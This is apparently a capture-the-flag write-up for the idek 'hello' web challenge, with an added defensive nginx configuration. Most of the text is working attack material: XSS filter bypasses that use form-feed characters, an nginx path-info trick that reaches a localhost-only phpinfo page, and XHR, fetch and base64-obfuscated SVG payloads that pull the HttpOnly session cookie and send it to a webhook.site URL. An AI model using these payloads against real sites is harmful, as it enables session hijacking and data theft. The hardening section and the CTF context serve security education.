hello

Bypassing the space filter

%09 \t horizontal tab
%0a \n line feed (newline)
%0c form feed
%0d \r carriage return (CR)
<img%0Csrc=1%0Conerror=eval(String.fromCharCode())%0c>

The cookie has HttpOnly set, so it cannot be read with document.cookie.
Consider using the phpinfo page to extract the cookie instead.

However, info.php only allows local access.

According to the nginx configuration file:

user www-data;
worker_processes  1;

events {
    worker_connections  1024;
}

http {
    include       /etc/nginx/mime.types;
    default_type  application/octet-stream;

    sendfile        on;
    keepalive_timeout  65;

    server {
        listen       80;
        server_name  localhost;

        location / {
            root   /usr/share/nginx/html;
            index  index.php index.html index.htm;
        }

        location = /info.php {
            allow 127.0.0.1;
            deny all;
        }

        location ~ \.php$ {
            root           /usr/share/nginx/html;
            fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
            include        fastcgi_params;
            fastcgi_pass   unix:/var/run/php/php8.2-fpm.sock;
        }

    }
}

Use info.php/index.php to bypass the restriction.
Reference article
PHP ignores the second .php segment and executes the first .php file, so /info.php/index.php runs info.php.
At the same time this path is not an exact match for location = /info.php, so it skips nginx's access check and is handled by the generic \.php$ location instead.
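As an added, defender-side example (not the challenge's configuration), this is how the server block above can be rewritten so that a path-info URI such as /info.php/index.php no longer reaches info.php; the directives are standard nginx, and the paths and socket are taken from the configuration above.

```nginx
# Added example: hardened version of the challenge's server block.
server {
    listen       80;
    server_name  localhost;
    root         /usr/share/nginx/html;
    index        index.php index.html index.htm;

    # "location = /info.php" only matches that exact URI, so
    # /info.php/index.php fell through to the generic PHP handler.
    # A regex location that matches /info.php and anything beneath it
    # closes that gap; regex locations are tried in order of appearance,
    # so this block must come before the generic "\.php$" block.
    location ~ ^/info\.php(/|$) {
        allow 127.0.0.1;
        deny  all;
        include        fastcgi_params;
        # Pin the script explicitly instead of deriving it from the URI.
        fastcgi_param  SCRIPT_FILENAME $document_root/info.php;
        fastcgi_pass   unix:/var/run/php/php8.2-fpm.sock;
    }

    location ~ \.php$ {
        # Only hand existing files to PHP-FPM: "/x.php/y.php" is not a
        # file, so it gets a 404 instead of executing x.php with PATH_INFO.
        try_files      $uri =404;
        include        fastcgi_params;
        fastcgi_param  SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass   unix:/var/run/php/php8.2-fpm.sock;
    }
}
```

After reloading nginx, a request for /info.php/index.php from any address other than 127.0.0.1 should receive 403 rather than the phpinfo page.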

Use an XMLHttpRequest in the following form:

var req = new XMLHttpRequest();
req.onload = reqListener;
var url = 'http://idek-hello.chal.idek.team:1337/info.php';
req.withCredentials = true;
req.open('GET', url, false);
req.send();

function reqListener() {
    var req2 = new XMLHttpRequest();
    const sess = this.responseText.substring(this.responseText.indexOf('HTTP_COOKIE') + 1);
    req2.open('GET', 'https://webhook.site/20962f32-4225-456a-83fb-769d5c10a23d/?data=' + btoa(sess), false);
    req2.send();
}

Encode it with CyberChef:

http://idek-hello.chal.idek.team:1337/?name=%3Cimg%0Csrc=1%0Conerror=eval(String.fromCharCode(0x76,0x61,.....))%3E

Using fetch:

fetch("/info.php/index.php").then(response => response.text()).then(data => fetch("https://webhook.site/20962f32-4225-456a-83fb-769d5c10a23d/?data=" + btoa(data.substring(data.indexOf("HTTP_COOKIE"), data.indexOf("HTTP_COOKIE") + 100))))

Payload:

<svg%0Conload=eval(atob("ZmV0Y2goIi9pbmZvLnBocC9pbmRleC5waHAiKS50aGVuKHJlc3BvbnNlID0%2BIHJlc3BvbnNlLnRleHQoKSkudGhlbihkYXRhID0%2BIGZldGNoKCJodHRwczovL3dlYmhvb2suc2l0ZS8yMDk2MmYzMi00MjI1LTQ1NmEtODNmYi03NjlkNWMxMGEyM2QvP2RhdGE9IitidG9hKGRhdGEuc3Vic3RyaW5nKGRhdGEuaW5kZXhPZigiSFRUUF9DT09LSUUiKSxkYXRhLmluZGV4T2YoIkhUVFBfQ09PS0lFIikrMTAwKSkpKQ%3D%3D"))>